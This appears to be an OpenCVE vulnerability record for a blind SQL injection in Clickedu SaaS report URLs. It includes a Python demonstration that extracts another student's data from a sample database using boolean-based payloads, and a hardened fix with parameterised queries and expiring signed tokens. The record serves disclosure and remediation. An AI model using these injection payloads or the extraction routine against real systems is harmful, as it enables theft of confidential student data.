Description
SQL injection vulnerability (SQLi) in Clickedu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application.

In the URL of the generated PDF, the session token used does not expire, so it remains valid for days after its generation, and unusual characters can be entered after the ‘id_alu’ parameter, resulting in two types of SQLi: boolean-based blind and time-based blind. Exploiting this vulnerability could allow an attacker to access confidential information in the database.
Published: 2026-02-17
Score: 8.3 High
EPSS: < 1% Very Low
KEV: No
Impact: Database Compromise
Action: Immediate Patch
AI Analysis

Impact

SQL Injection vulnerability exists in Clickedu SaaS platform during report generation. An authenticated remote attacker can exploit the non-expiring session token and append malicious characters to the 'id_alu' parameter in the PDF generation URL, leading to boolean-based or time-based blind SQL injection. The exploit enables reading confidential database information without needing higher privileges.
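To make the two blind variants concrete, the following is an added example (not Clickedu's code; the table, column and secret values are constructed, and the vulnerable query is an assumed reconstruction of the CWE-89 pattern the advisory describes). It runs against an in-memory SQLite database: the "endpoint" only reports whether a PDF would be produced, and the attacker turns that single bit into a read of another student's column through the 'id_alu' parameter.

```python
import sqlite3

# Constructed sample data standing in for the Clickedu database; the table
# and column names are assumptions, not the vendor's schema.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alumnos (id_alu INTEGER PRIMARY KEY, nombre TEXT, secret TEXT)")
    conn.executemany("INSERT INTO alumnos VALUES (?, ?, ?)",
                     [(1, "Ana", "s3cr3t"), (2, "Luis", "hunter2")])
    return conn

REQUESTS = {"count": 0}  # how many report downloads the attacker needed

def vulnerable_report_exists(conn, id_alu):
    """Assumed vulnerable pattern (CWE-89): the raw URL parameter is
    interpolated into the SQL text. The caller only learns whether a
    report was produced, never the query output: the blind setting."""
    REQUESTS["count"] += 1
    sql = f"SELECT nombre FROM alumnos WHERE id_alu = {id_alu}"
    return conn.execute(sql).fetchone() is not None

def ask(conn, condition):
    # Boolean oracle: a true condition keeps the attacker's own row (report
    # generated), a false one drops it (no report). Payload: "1 AND (<cond>)".
    return vulnerable_report_exists(conn, f"1 AND ({condition})")

def blind_int(conn, expr, lo, hi):
    # Binary search for the integer value of a SQL expression using only
    # yes/no answers: about log2(hi - lo) requests instead of one per candidate.
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(conn, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_secret(conn, target_id):
    # Read another student's 'secret' column through the attacker's own
    # id_alu=1 request: first its length, then each character's code point.
    sub = f"(SELECT secret FROM alumnos WHERE id_alu = {target_id})"
    length = blind_int(conn, f"length({sub})", 0, 64)
    chars = []
    for pos in range(1, length + 1):
        code = blind_int(conn, f"unicode(substr({sub}, {pos}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_report_exists(db, "1 AND 1=1"))  # report produced
    print(vulnerable_report_exists(db, "1 AND 1=2"))  # no report
    print(extract_secret(db, 2), "after", REQUESTS["count"], "requests")
```

The time-based variant the advisory also names uses the same oracle with a different signal: instead of "report or no report", the condition gates a delay (SLEEP() on MySQL, pg_sleep() on PostgreSQL) and the attacker measures response time. SQLite has no sleep function, so only the boolean form is shown here.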

Affected Systems

Clickedu SaaS platform; the CPE record lists all versions as affected. The vendor states the fix shipped in the integration update of 26/01 (no version number is given in the advisory).

Risk and Exploitability

The vulnerability has a CVSS 4.0 score of 8.3 (High), but the EPSS score is below 1% and the SSVC assessment records no known exploitation and rates it not automatable, so the current probability of exploitation is low. It is not listed in the CISA KEV catalog. The attack requires an authenticated remote user with ordinary privileges (PR:L) and relies on missing input validation of the 'id_alu' parameter combined with a report-URL token that stays valid for days after the report is downloaded.

Generated by OpenCVE AI on April 17, 2026 at 18:57 UTC.

Remediation

Vendor Solution

The vulnerability has been fixed by the Clickedu team in the integration of 26/01.


OpenCVE Recommended Actions

  • Apply the integration update released on 26/01 to patch the SQL injection vulnerability.
  • Make the token embedded in report URLs short-lived and bind it to the requesting user and the specific report, so a captured URL cannot be replayed days later.
  • Treat 'id_alu' as an integer identifier: reject anything that is not a plain numeric student id before it reaches the data layer, and pass it to the database as a bound parameter rather than splicing it into the SQL text, which removes the injection regardless of which characters get through.
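A hardened version of the same report endpoint, as an added example (not Clickedu's code; the schema, the signing key and the URL token format are assumptions): 'id_alu' is validated as a plain integer and passed as a bound parameter, and the link carries an HMAC-signed, time-limited token bound to that student id instead of a long-lived session token.

```python
import hashlib
import hmac
import re
import sqlite3

# Assumed server-side key; in production it comes from a secrets store and is rotated.
SIGNING_KEY = b"replace-with-a-random-256-bit-key"
TOKEN_TTL_SECONDS = 15 * 60   # a report link stays valid for 15 minutes, not days
ID_ALU_RE = re.compile(r"[0-9]{1,10}")

def demo_db():
    # Constructed sample data; table and column names are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alumnos (id_alu INTEGER PRIMARY KEY, nombre TEXT)")
    conn.executemany("INSERT INTO alumnos VALUES (?, ?)", [(1, "Ana"), (2, "Luis")])
    return conn

def make_report_token(id_alu: int, now: int) -> str:
    """Mint the token embedded in the PDF URL: id_alu, expiry, and an HMAC over both."""
    expires = now + TOKEN_TTL_SECONDS
    msg = f"{id_alu}.{expires}".encode()
    sig = hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()
    return f"{id_alu}.{expires}.{sig}"

def verify_report_token(token: str, now: int):
    """Return the student id the token was minted for, or None if the token
    is malformed, tampered with, or past its expiry."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    id_str, exp_str, sig = parts
    if not (id_str.isdigit() and exp_str.isdigit()):
        return None
    expected = hmac.new(SIGNING_KEY, f"{id_str}.{exp_str}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):   # constant-time comparison
        return None
    if now >= int(exp_str):
        return None
    return int(id_str)

def parse_id_alu(raw: str) -> int:
    """Accept only a plain decimal identifier; '1 AND 1=1' never reaches the query."""
    if not ID_ALU_RE.fullmatch(raw):
        raise ValueError("id_alu must be a positive integer")
    return int(raw)

def safe_report_lookup(conn, raw_id_alu: str, token: str, now: int):
    """Name of the student whose report may be rendered, or None if the
    request is not authorised."""
    id_alu = parse_id_alu(raw_id_alu)
    if verify_report_token(token, now) != id_alu:
        return None   # expired, forged, or minted for a different student
    # Parameterised query: the value is bound, never spliced into the SQL text.
    row = conn.execute("SELECT nombre FROM alumnos WHERE id_alu = ?", (id_alu,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = demo_db()
    t0 = 1_700_000_000
    tok = make_report_token(1, t0)
    print(safe_report_lookup(db, "1", tok, t0 + 60))                     # Ana
    print(safe_report_lookup(db, "1", tok, t0 + TOKEN_TTL_SECONDS + 1))  # None: expired
    print(safe_report_lookup(db, "2", tok, t0 + 60))                     # None: not this student
```

In a real deployment the token would also carry the id of the authenticated account that requested the report, so that a link minted for one guardian cannot be used from another session even before it expires; that field is omitted here to keep the example focused on the two defects the advisory names.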


Tracking


Advisories

No advisories yet.

History

Tue, 17 Feb 2026 15:15:00 +0000

  • Metrics (ssvc) added, nothing removed: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 17 Feb 2026 12:00:00 +0000 (initial record; every entry below was added, nothing removed)

  • Description: SQL injection vulnerability (SQLi) in Clickedu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application. In the URL of the generated PDF, the session token used does not expire, so it remains valid for days after its generation, and unusual characters can be entered after the ‘id_alu’ parameter, resulting in two types of SQLi: boolean-based blind and time-based blind. Exploiting this vulnerability could allow an attacker to access confidential information in the database.
  • Title: SQL Injection in Clickedu's SaaS platform
  • First Time appeared: Clickedu; Clickedu saas Platform
  • Weaknesses: CWE-89
  • CPEs: cpe:2.3:a:clickedu:saas_platform:all_versions:*:*:*:*:*:*:*
  • Vendors & Products: Clickedu; Clickedu saas Platform
  • References: (none listed)
  • Metrics (cvssV4_0): {'score': 8.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-02-17T14:27:12.189Z

Reserved: 2026-02-09T13:32:29.854Z

Link: CVE-2026-2247

Vulnrichment

Updated: 2026-02-17T14:27:03.648Z

NVD

Status : Deferred

Published: 2026-02-17T12:16:15.443

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-2247

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-17T19:00:11Z

Weaknesses